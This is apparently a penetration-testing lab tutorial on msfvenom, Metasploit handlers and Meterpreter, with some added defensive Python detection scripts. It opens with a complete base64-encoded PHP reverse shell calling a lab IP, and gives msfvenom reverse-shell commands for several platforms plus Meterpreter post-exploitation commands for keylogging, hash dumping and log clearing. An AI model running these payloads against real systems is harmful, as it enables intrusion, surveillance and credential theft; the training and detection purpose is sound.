eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzEwLjEwLjE4Ni40NCc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFjaygi.TmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7));
root@ip-10-10-186-44:~#
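The eval(base64_decode(...)) wrapper above is exactly why encoding is not evasion: anything that can run the payload can also decode it, and so can a scanner. The following is an added example, not msfvenom or Metasploit code, showing how a file scanner unwraps that layer and then looks for the combination of a connect-out call and an eval-style sink that characterises a PHP reverse shell. The sample PHP is constructed (a few function names in an incomplete string, not a working shell) and the regular expressions are this example's own.

```python
"""Unwrap php/base64-style encoding and flag the decoded PHP.

Added example, not Metasploit or msfvenom code. SAMPLE_PHP is
constructed; the regexes are this example's own, not a product signature.
"""
import base64
import re

# eval(base64_decode(<blob>)) with optional quotes, as php/base64 emits it.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)\s*\)")

# Indicators that together look like a network-connected code loader.
SUSPICIOUS = {
    "network": re.compile(r"\b(fsockopen|stream_socket_client|socket_create)\s*\("),
    "execution": re.compile(r"\b(eval|create_function|assert)\s*\("),
}

# Constructed inner text (undefined variables, not runnable), wrapped the way
# the page's msfvenom output is wrapped.
_INNER = "/*<?php /**/ $s = fsockopen($host, $port); eval(fread($s, 1024));"
SAMPLE_PHP = "eval(base64_decode(" + base64.b64encode(_INNER.encode()).decode() + "));"


def unwrap_base64_eval(source, max_depth=5):
    """Peel nested eval(base64_decode(...)) layers; return (code, layers_removed)."""
    code, layers = source, 0
    while layers < max_depth:
        m = EVAL_B64.search(code)
        if not m:
            break
        try:
            code = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            break  # not valid base64: stop unwrapping, keep what we have
        layers += 1
    return code, layers


def scan_php(source):
    """Report indicators found after unwrapping, plus a simple verdict."""
    code, layers = unwrap_base64_eval(source)
    found = {cat: sorted(set(rx.findall(code))) for cat, rx in SUSPICIOUS.items()}
    found["base64_layers"] = layers
    # A connect-out primitive together with an eval-style sink is the
    # reverse-shell shape; either alone is common in legitimate code.
    found["verdict"] = "suspicious" if found["network"] and found["execution"] else "clean"
    return found


if __name__ == "__main__":
    print(scan_php(SAMPLE_PHP))
    print(scan_php("<?php echo 'hello'; ?>"))
```

Requiring both indicator classes keeps the rule from firing on ordinary code that merely uses eval or opens a socket; the layer count is reported separately because an encoded wrapper around harmless code is itself worth a look.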

Handlers

Similar to exploits using a reverse shell, you will need to be able to accept incoming connections generated by the MSFvenom payload. When using an exploit module, this part is handled automatically by the exploit module; you will remember how the payload options section appeared when setting a reverse shell. The term commonly used for receiving a connection from a target is 'catching a shell'. Reverse shells or Meterpreter callbacks generated by your MSFvenom payload can be caught easily using a handler.

The following scenario may be familiar: we will exploit the file upload vulnerability present in DVWA (Damn Vulnerable Web Application). For the exercises in this task, you will need to replicate a similar scenario on another target system; DVWA was used here for illustration purposes. The exploit steps are:

  1. Generate the PHP shell using MSFvenom
  2. Start the Metasploit handler
  3. Execute the PHP shell

MSFvenom will require a payload, the local machine IP address, and the local port to which the payload will connect. Seen below, 10.0.2.19 is the IP address of a Kali Linux machine used in the attack and local port 7777 was chosen.

root@ip-10-0-2-19:~# msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3020 bytes
root@ip-10-0-2-19:~#

Please note: in the output PHP file, the opening PHP tag is commented out and the closing tag (?>) is missing, as the screenshot of the raw file showed.

(Screenshot: raw reverse_shell.php as generated by msfvenom, with the opening tag inside a comment and no closing tag.)

The reverse_shell.php file should be edited to convert it into a working PHP file.

(Screenshot: comments removed from the beginning of the file.)

(Screenshot: end tag added.)

We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command.

Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.

To use the module, we will need to set the payload value (php/reverse_php in this case), the LHOST, and LPORT values.

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set lhost 10.0.2.19
lhost => 10.0.2.19
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/reverse_php):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.19        yes       The listen address (an interface may be specified)
   LPORT  7777             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) >

Once everything is set, we will run the handler and wait for the incoming connection.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.186.44:7777

When the reverse shell is triggered, the connection will be received by multi/handler and provide us with a shell.

If the payload was set as Meterpreter (e.g. in a Windows executable format), multi/handler would then provide us with a Meterpreter shell.

Other Payloads

Based on the target system's configuration (operating system, installed web server, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use:

In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.

Linux Executable and Linkable Format (elf):

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine. For example, once you have the rev_shell.elf file on your target machine, use the chmod +x rev_shell.elf command to grant executable permissions. Once done, you can run this file by typing ./rev_shell.elf on the target machine command line.

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

All of the examples above are reverse payloads. This means you will need to have the exploit/multi/handler module listening on your attacking machine to work as a handler. You will need to set up the handler accordingly with the payload, LHOST and LPORT parameters. These values will be the same ones you used when creating the msfvenom payload.

Meterpreter

Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a command and control architecture. You will interact with the target operating system and files and use Meterpreter's specialized commands.

Meterpreter has many versions which will provide different functionalities based on the target system.

How does Meterpreter work?

Meterpreter runs on the target system but is not installed on it. It runs in memory and does not write itself to disk on the target. This aims to avoid detection by antivirus scans: by default, most antivirus software scans new files written to disk (e.g. when you download a file from the internet). Meterpreter runs in memory (RAM, Random Access Memory) so that no file (e.g. meterpreter.exe) has to be written to the disk on the target system. This way, Meterpreter is seen only as a process and has no file on the target system.

Meterpreter also aims to avoid being detected by network-based IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) solutions by using encrypted communication with the server where Metasploit runs (typically your attacking machine). If the target organization does not decrypt and inspect encrypted traffic (e.g. HTTPS) coming to and going out of the local network, IPS and IDS solutions will not be able to detect its activities.

While Meterpreter is recognized by major antivirus software, this feature provides some degree of stealth.

The example below shows a target Windows machine exploited using the MS17-010 vulnerability. You will see Meterpreter is running with a process ID (PID) of 1304; this PID will be different in your case. We have used the getpid command, which returns the process ID with which Meterpreter is running. The process ID (or process identifier) is used by operating systems to identify running processes. All processes running in Linux or Windows will have a unique ID number; this number is used to interact with the process when the need arises (e.g. if it needs to be stopped).

meterpreter > getpid 
Current pid: 1304

If we list processes running on the target system using the ps command, we see PID 1304 is spoolsv.exe and not Meterpreter.exe, as one might expect.

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]                                                   
 4     0     System                x64   0                                      
 396   644   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 428   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 548   540   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 596   540   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 604   588   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 644   588   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 692   596   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 700   692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  
 716   596   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 1276  1304  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\cmd.exe
 1304  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1340  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1388  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe

Even if we were to go a step further and look at the DLLs (Dynamic-Link Libraries) used by the Meterpreter process (PID 1304 in this case), we still would not find anything jumping out at us (e.g. no meterpreter.dll).

C:\Windows\system32>tasklist /m /fi "pid eq 1304"
tasklist /m /fi "pid eq 1304"

Image Name                     PID Modules                                     
========================= ======== ============================================
spoolsv.exe                   1304 ntdll.dll, kernel32.dll, KERNELBASE.dll,    
                                   msvcrt.dll, sechost.dll, RPCRT4.dll,        
                                   USER32.dll, GDI32.dll, LPK.dll, USP10.dll,  
                                   POWRPROF.dll, SETUPAPI.dll, CFGMGR32.dll,   
                                   ADVAPI32.dll, OLEAUT32.dll, ole32.dll,      
                                   DEVOBJ.dll, DNSAPI.dll, WS2_32.dll,         
                                   NSI.dll, IMM32.DLL, MSCTF.dll,              
                                   CRYPTBASE.dll, slc.dll, RpcRtRemote.dll,    
                                   secur32.dll, SSPICLI.DLL, credssp.dll,      
                                   IPHLPAPI.DLL, WINNSI.DLL, mswsock.dll,      
                                   wshtcpip.dll, wship6.dll, rasadhlp.dll,     
                                   fwpuclnt.dll, CLBCatQ.DLL, umb.dll,         
                                   ATL.DLL, WINTRUST.dll, CRYPT32.dll,         
                                   MSASN1.dll, localspl.dll, SPOOLSS.DLL,      
                                   srvcli.dll, winspool.drv,                   
                                   PrintIsolationProxy.dll, FXSMON.DLL,        
                                   tcpmon.dll, snmpapi.dll, wsnmp32.dll,       
                                   msxml6.dll, SHLWAPI.dll, usbmon.dll,        
                                   wls0wndh.dll, WSDMon.dll, wsdapi.dll,       
                                   webservices.dll, FirewallAPI.dll,           
                                   VERSION.dll, FunDisc.dll, fdPnp.dll,        
                                   winprint.dll, USERENV.dll, profapi.dll,     
                                   GPAPI.dll, dsrole.dll, win32spl.dll,        
                                   inetpp.dll, DEVRTL.dll, SPINF.dll,          
                                   CRYPTSP.dll, rsaenh.dll, WINSTA.dll,        
                                   cscapi.dll, netutils.dll, WININET.dll,      
                                   urlmon.dll, iertutil.dll, WINHTTP.dll,      
                                   webio.dll, SHELL32.dll, MPR.dll,            
                                   NETAPI32.dll, wkscli.dll, PSAPI.DLL,        
                                   WINMM.dll, dhcpcsvc6.DLL, dhcpcsvc.DLL,     
                                   apphelp.dll, NLAapi.dll, napinsp.dll,       
                                   pnrpnsp.dll, winrnr.dll                     

C:\Windows\system32>
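The listing above does leave a defender-side trace: PID 1276 cmd.exe has PPID 1304, so the print spooler service is the parent of a command shell, which it never is in normal operation. As an added example (not part of the original room), this Python script parses a Meterpreter-style ps listing and flags such parent/child anomalies; the sample listing is a constructed subset of the one above, and the expected-parent baseline is an assumption to tune per environment.

```python
"""Flag suspicious parent/child pairs in a Meterpreter `ps` process listing.

Added example, not part of the original room. PS_LISTING is a constructed subset
of the listing shown above; EXPECTED_PARENTS and SERVICE_PROCESSES are an assumed
baseline that a defender would tune for their own environment.
"""
import re

# Constructed subset of the Meterpreter `ps` output shown above.
PS_LISTING = r"""
 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 428   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 548   540   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 596   540   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 692   596   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 716   596   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 1276  1304  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\cmd.exe
 1304  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1388  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
"""

# Assumed baseline: which parent each well-known Windows process should have.
EXPECTED_PARENTS = {
    "services.exe": {"wininit.exe"},
    "lsass.exe": {"wininit.exe"},
    "lsm.exe": {"wininit.exe"},
    "svchost.exe": {"services.exe"},
    "spoolsv.exe": {"services.exe"},
    "conhost.exe": {"csrss.exe"},
}
# Service-side processes that should never spawn an interactive shell.
SERVICE_PROCESSES = {"services.exe", "svchost.exe", "spoolsv.exe", "lsass.exe",
                     "wininit.exe", "winlogon.exe", "lsm.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# A data row starts with two integers (PID, PPID); header and separator rows do not.
ROW_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(.+?)\s*$")


def parse_ps(listing):
    """Return {pid: (ppid, name)} from a Meterpreter `ps` listing."""
    procs = {}
    for line in listing.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        # Columns are aligned with runs of spaces; the name itself may contain a
        # single space ("[System Process]"), so split on two or more spaces.
        name = re.split(r"\s{2,}", m.group(3))[0].lower()
        procs[int(m.group(1))] = (int(m.group(2)), name)
    return procs


def find_anomalies(procs):
    """Return (pid, name, ppid, parent_name, reason) for each suspicious process."""
    findings = []
    for pid, (ppid, name) in sorted(procs.items()):
        parent = procs.get(ppid)
        parent_name = parent[1] if parent else "<not in listing>"
        if name in SHELLS and parent_name in SERVICE_PROCESSES:
            findings.append((pid, name, ppid, parent_name,
                             "interactive shell spawned by a service process"))
        elif parent and name in EXPECTED_PARENTS and parent_name not in EXPECTED_PARENTS[name]:
            findings.append((pid, name, ppid, parent_name,
                             "unexpected parent; expected " + "/".join(sorted(EXPECTED_PARENTS[name]))))
    return findings


if __name__ == "__main__":
    for pid, name, ppid, pname, reason in find_anomalies(parse_ps(PS_LISTING)):
        print(f"PID {pid} {name} <- PPID {ppid} {pname}: {reason}")
```

The same parent/child rule is what endpoint telemetry (process creation events with parent image) lets you alert on without needing to spot Meterpreter's in-memory code at all.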

Meterpreter flavors

As you will remember, staged payloads are sent to the target in two steps. An initial part (the stager) is installed first and requests the rest of the payload. This allows for a smaller initial payload size. Inline payloads are sent in a single step. Meterpreter payloads are also divided into staged and inline versions. However, Meterpreter has a wide range of different versions you can choose from based on your target system.

The easiest way to get an overview of the available Meterpreter versions is to list them using msfvenom, as seen below.

We have used the msfvenom --list payloads command and grepped "meterpreter" payloads (adding | grep meterpreter to the command line), so the output only shows these.

root@ip-10-10-186-44:~# msfvenom --list payloads | grep meterpreter
    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS
    android/meterpreter/reverse_tcp                     Run a meterpreter server in Android. Connect back stager
    android/meterpreter_reverse_http                    Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_https                   Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_tcp                     Connect back to the attacker and spawn a Meterpreter shell
    apple_ios/aarch64/meterpreter_reverse_http          Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/aarch64/meterpreter_reverse_https         Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/aarch64/meterpreter_reverse_tcp           Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/armle/meterpreter_reverse_http            Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/armle/meterpreter_reverse_https           Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/armle/meterpreter_reverse_tcp             Run the Meterpreter / Mettle server payload (stageless)
    java/meterpreter/bind_tcp                           Run a meterpreter server in Java. Listen for a connection
    java/meterpreter/reverse_http                       Run a meterpreter server in Java. Tunnel communication over HTTP
    java/meterpreter/reverse_https                      Run a meterpreter server in Java. Tunnel communication over HTTPS
    java/meterpreter/reverse_tcp                        Run a meterpreter server in Java. Connect back stager
    linux/aarch64/meterpreter/reverse_tcp               Inject the mettle server payload (staged). Connect back to the attacker
    linux/aarch64/meterpreter_reverse_http              Run the Meterpreter / Mettle server payload (stageless)
    linux/aarch64/meterpreter_reverse_https             Run the Meterpreter / Mettle server payload (stageless)
    linux/aarch64/meterpreter_reverse_tcp               Run the Meterpreter / Mettle server payload (stageless)
    linux/armbe/meterpreter_reverse_http                Run the Meterpreter / Mettle server payload (stageless)
    linux/armbe/meterpreter_reverse_https               Run the Meterpreter / Mettle server payload (stageless)
    linux/armbe/meterpreter_reverse_tcp                 Run the Meterpreter / Mettle server payload (stageless)
    linux/armle/meterpreter/bind_tcp                    Inject the mettle server payload (staged). Listen for a connection
    linux/armle/meterpreter/reverse_tcp                 Inject the mettle server payload (staged). Connect back to the attacker [...]

The list will show Meterpreter versions available for the following platforms:

  • Android
  • Apple iOS
  • Java
  • Linux
  • OSX
  • PHP
  • Python
  • Windows

Your decision on which version of Meterpreter to use will be based mostly on three factors:

  • The target operating system (Is the target operating system Linux or Windows? Is it a Mac device? Is it an Android phone? etc.)
  • Components available on the target system (Is Python installed? Is this a PHP website? etc.)
  • Network connection types you can have with the target system (Do they allow raw TCP connections? Can you only have an HTTPS reverse connection? Are IPv6 addresses not as closely monitored as IPv4 addresses? etc.)
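The names in the list encode this choice: a staged payload has meterpreter as its own path segment followed by the stager (linux/aarch64/meterpreter/reverse_tcp), while a stageless one carries the transport in a single meterpreter_ segment (linux/aarch64/meterpreter_reverse_tcp). As an added example (not the room's own code), this Python helper parses that naming convention and filters a constructed subset of the listing by platform, staging and transport; the classification rules are assumed from the naming pattern, not taken from Metasploit's own code.

```python
"""Classify Meterpreter payload names by the naming convention in the listing above.

Added example, not part of the original room. PAYLOAD_NAMES is a constructed
subset of `msfvenom --list payloads`; the rules below are assumed from the naming
pattern: ".../meterpreter/<stager>" is staged, ".../meterpreter_<transport>" is
stageless (inline).
"""
from dataclasses import dataclass

# Constructed subset of the listing shown above (payload names only).
PAYLOAD_NAMES = [
    "android/meterpreter/reverse_http",
    "android/meterpreter_reverse_tcp",
    "apple_ios/aarch64/meterpreter_reverse_https",
    "java/meterpreter/bind_tcp",
    "linux/aarch64/meterpreter/reverse_tcp",
    "linux/armle/meterpreter/bind_tcp",
    "windows/x64/meterpreter/bind_ipv6_tcp",
    "windows/x64/meterpreter/reverse_tcp",
]


@dataclass(frozen=True)
class PayloadInfo:
    name: str
    platform: str   # first path segment: android, apple_ios, java, linux, windows, ...
    arch: str       # segments between platform and meterpreter, "" when absent
    staged: bool    # True for ".../meterpreter/<stager>", False for ".../meterpreter_<transport>"
    direction: str  # "reverse" (connect back to the handler) or "bind" (listen on the target)
    transport: str  # "tcp", "http", "https", "ipv6_tcp", ...


def classify(name):
    """Split a Meterpreter payload name into the factors the text lists."""
    parts = name.split("/")
    if len(parts) < 2:
        raise ValueError(f"unexpected payload name: {name}")
    platform = parts[0]
    if parts[-2] == "meterpreter":
        staged, arch, stager = True, "/".join(parts[1:-2]), parts[-1]
    elif parts[-1].startswith("meterpreter_"):
        staged, arch, stager = False, "/".join(parts[1:-1]), parts[-1][len("meterpreter_"):]
    else:
        raise ValueError(f"not a Meterpreter payload: {name}")
    direction, _, transport = stager.partition("_")
    if direction not in ("reverse", "bind") or not transport:
        raise ValueError(f"unrecognised stager segment in {name}: {stager}")
    return PayloadInfo(name, platform, arch, staged, direction, transport)


def select(names, platform=None, staged=None, transport=None, direction=None):
    """Return the payload names matching every constraint given (None = no constraint)."""
    chosen = []
    for name in names:
        try:
            info = classify(name)
        except ValueError:
            continue  # not a Meterpreter payload; skip it
        if platform is not None and info.platform != platform:
            continue
        if staged is not None and info.staged != staged:
            continue
        if transport is not None and info.transport != transport:
            continue
        if direction is not None and info.direction != direction:
            continue
        chosen.append(name)
    return chosen


if __name__ == "__main__":
    # Example: only an HTTPS reverse connection is allowed out of the target network.
    for name in select(PAYLOAD_NAMES, transport="https", direction="reverse"):
        print(classify(name))
```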

If you are not using Meterpreter as a standalone payload generated by Msfvenom, your choice may also be limited by the exploit. You will notice some exploits will have a default Meterpreter payload, as you can see in the example below with the ms17_010_eternalblue exploit.

msf6 > use exploit/windows/smb/ms17_010_eternalblue 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

You can also list other available payloads using the show payloads command with any module.

msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads 

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   generic/custom                                               manual  No     Custom Payload
   1   generic/shell_bind_tcp                                       manual  No     Generic Command Shell, Bind TCP Inline
   2   generic/shell_reverse_tcp                                    manual  No     Generic Command Shell, Reverse TCP Inline
   3   windows/x64/exec                                             manual  No     Windows x64 Execute Command
   4   windows/x64/loadlibrary                                      manual  No     Windows x64 LoadLibrary Path
   5   windows/x64/messagebox                                       manual  No     Windows MessageBox x64
   6   windows/x64/meterpreter/bind_ipv6_tcp                        manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   windows/x64/meterpreter/bind_ipv6_tcp_uuid                   manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   windows/x64/meterpreter/bind_named_pipe                      manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager [...]

Meterpreter commands

Typing help on any Meterpreter session (shown by meterpreter> at the prompt) will list all available commands.

The Meterpreter help menu:

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel[...]

Every version of Meterpreter will have different command options, so running the help command is always a good idea. Commands are built-in tools available on Meterpreter. They will run on the target system without loading any additional script or executable files.

Meterpreter will provide you with three primary categories of tools:

  • Built-in commands
  • Meterpreter tools
  • Meterpreter scripting

If you run the help command, you will see Meterpreter commands are listed under different categories.

  • Core commands
  • File system commands
  • Networking commands
  • System commands
  • User interface commands
  • Webcam commands
  • Audio output commands
  • Elevate commands
  • Password database commands
  • Timestomp commands

Please note that the list above was taken from the output of the help command on the Windows version of Meterpreter (windows/x64/meterpreter/reverse_tcp). These will be different for other Meterpreter versions.

Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used. Remember to check all available commands by running the help command once a Meterpreter session has started.

Core commands

  • background: Backgrounds the current session
  • exit: Terminate the Meterpreter session
  • guid: Get the session GUID (Globally Unique Identifier)
  • help: Displays the help menu
  • info: Displays information about a Post module
  • irb: Opens an interactive Ruby shell on the current session
  • load: Loads one or more Meterpreter extensions
  • migrate: Allows you to migrate Meterpreter to another process
  • run: Executes a Meterpreter script or Post module
  • sessions: Quickly switch to another session

File system commands

  • cd: Will change directory
  • ls: Will list files in the current directory (dir will also work)
  • pwd: Prints the current working directory
  • edit: will allow you to edit a file
  • cat: Will show the contents of a file to the screen
  • rm: Will delete the specified file
  • search: Will search for files
  • upload: Will upload a file or directory
  • download: Will download a file or directory

Networking commands

  • arp: Displays the host ARP (Address Resolution Protocol) cache
  • ifconfig: Displays network interfaces available on the target system
  • netstat: Displays the network connections
  • portfwd: Forwards a local port to a remote service
  • route: Allows you to view and modify the routing table

System commands

  • clearev: Clears the event logs
  • execute: Executes a command
  • getpid: Shows the current process identifier
  • getuid: Shows the user that Meterpreter is running as
  • kill: Terminates a process
  • pkill: Terminates processes by name
  • ps: Lists running processes
  • reboot: Reboots the remote computer
  • shell: Drops into a system command shell
  • shutdown: Shuts down the remote computer
  • sysinfo: Gets information about the remote system, such as OS

Other commands (these will be listed under different menu categories in the help menu)

  • idletime: Returns the number of seconds the remote user has been idle
  • keyscan_dump: Dumps the keystroke buffer
  • keyscan_start: Starts capturing keystrokes
  • keyscan_stop: Stops capturing keystrokes
  • screenshare: Allows you to watch the remote user's desktop in real time
  • screenshot: Grabs a screenshot of the interactive desktop
  • record_mic: Records audio from the default microphone for X seconds
  • webcam_chat: Starts a video chat
  • webcam_list: Lists webcams
  • webcam_snap: Takes a snapshot from the specified webcam
  • webcam_stream: Plays a video stream from the specified webcam
  • getsystem: Attempts to elevate your privilege to that of local system
  • hashdump: Dumps the contents of the SAM database

Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment.

Post-Exploitation with Meterpreter

Meterpreter provides you with many useful commands that facilitate the post-exploitation phase. Below are a few examples you will often use.

Help

This command will give you a list of all available commands in Meterpreter. As we have seen earlier, Meterpreter has many versions, and each version may have different options available. Typing help once you have a Meterpreter session will help you quickly browse through available commands.

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel[...]

getuid

The getuid command will display the user with which Meterpreter is currently running. This will give you an idea of your possible privilege level on the target system (e.g. are you an admin-level user like NT AUTHORITY\SYSTEM or a regular user?).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

The ps command will list running processes. The PID column will also give you the PID information you will need to migrate Meterpreter to another process.

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]                                                   
 4     0     System                x64   0                                      
 396   644   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 428   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
